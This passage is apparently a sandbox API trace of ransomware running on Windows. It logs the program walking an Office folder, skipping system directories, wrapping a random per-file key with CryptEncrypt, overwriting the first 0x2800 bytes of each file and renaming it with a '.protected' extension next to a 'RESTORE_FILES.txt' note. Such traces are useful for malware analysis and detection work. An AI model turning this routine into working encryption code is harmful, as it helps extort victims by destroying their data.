lpOverlapped=0x0) returned 1 [0070.522] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.522] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.524] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.524] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.526] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.526] CloseHandle (hObject=0xd8) returned 1 [0070.526] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.protected") returned 83 [0070.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll.protected")) returned 1 [0070.527] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.527] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="Windows") returned -1 [0070.527] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.527] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.527] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.527] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0070.527] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll") returned 69 [0070.527] StrStrIW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.527] lstrcmpW (lpString1="SGRES.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.527] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.527] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.527] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.528] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll") returned 69 [0070.528] StrStrW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.528] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll") returned 69 [0070.528] StrStrW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.528] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll") returned 69 [0070.528] StrStrW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.528] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.542] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.542] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.548] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.548] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.548] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.548] CloseHandle (hObject=0xd8) returned 1 [0070.549] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.protected") returned 79 [0070.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll.protected")) returned 1 [0070.549] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.549] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0070.549] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.549] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.549] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.549] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0070.550] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll") returned 70 [0070.550] StrStrIW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.550] lstrcmpW (lpString1="STINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.550] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.550] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.550] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.550] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll") returned 70 [0070.550] StrStrW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.550] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll") returned 70 [0070.550] StrStrW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.550] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll") returned 70 [0070.550] StrStrW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.550] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.561] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.561] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.562] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.562] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.566] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.566] CloseHandle (hObject=0xd8) returned 1 [0070.566] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.protected") returned 80 [0070.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll.protected")) returned 1 [0070.567] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.567] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="Windows") returned -1 [0070.567] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.567] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.567] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.567] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0070.567] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll") returned 72 [0070.567] StrStrIW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.567] lstrcmpW (lpString1="VISBRRES.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.567] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.567] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.567] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.568] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll") returned 72 [0070.568] StrStrW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.568] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll") returned 72 [0070.568] StrStrW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.568] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll") returned 72 [0070.568] StrStrW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.568] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.579] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.579] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.580] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.580] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.581] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.581] CloseHandle (hObject=0xd8) returned 1 [0070.582] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.protected") returned 82 [0070.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll.protected")) returned 1 [0070.583] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.583] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0070.583] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.583] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.583] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.583] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0070.583] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll") returned 71 [0070.583] StrStrIW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.583] lstrcmpW (lpString1="VISINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.583] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.583] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.583] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.583] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll") returned 71 [0070.583] StrStrW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.583] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll") returned 71 [0070.583] StrStrW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.583] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll") returned 71 [0070.584] StrStrW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.584] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.601] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.601] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.602] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.602] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.613] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.613] CloseHandle (hObject=0xd8) returned 1 [0070.614] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.protected") returned 81 [0070.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll.protected")) returned 1 [0070.614] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.615] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="Windows") returned 1 [0070.615] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.615] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.615] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.615] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0070.615] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll") returned 70 [0070.615] StrStrIW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.615] lstrcmpW (lpString1="WWINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.615] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.615] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.615] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.615] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll") returned 70 [0070.615] StrStrW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.615] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll") returned 70 [0070.615] StrStrW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.615] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll") returned 70 [0070.615] StrStrW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.615] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.639] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.639] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.640] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.640] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.645] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.645] CloseHandle (hObject=0xd8) returned 1 [0070.645] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.protected") returned 80 [0070.646] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll.protected")) returned 1 [0070.646] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.646] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="Windows") returned 1 [0070.646] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="Program Files") returned 1 [0070.646] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.646] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.646] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="System Volume Information") returned 1 [0070.646] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll") returned 71 [0070.646] StrStrIW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0070.646] lstrcmpW (lpString1="WWINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.646] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.646] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.646] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.655] lstrlenW 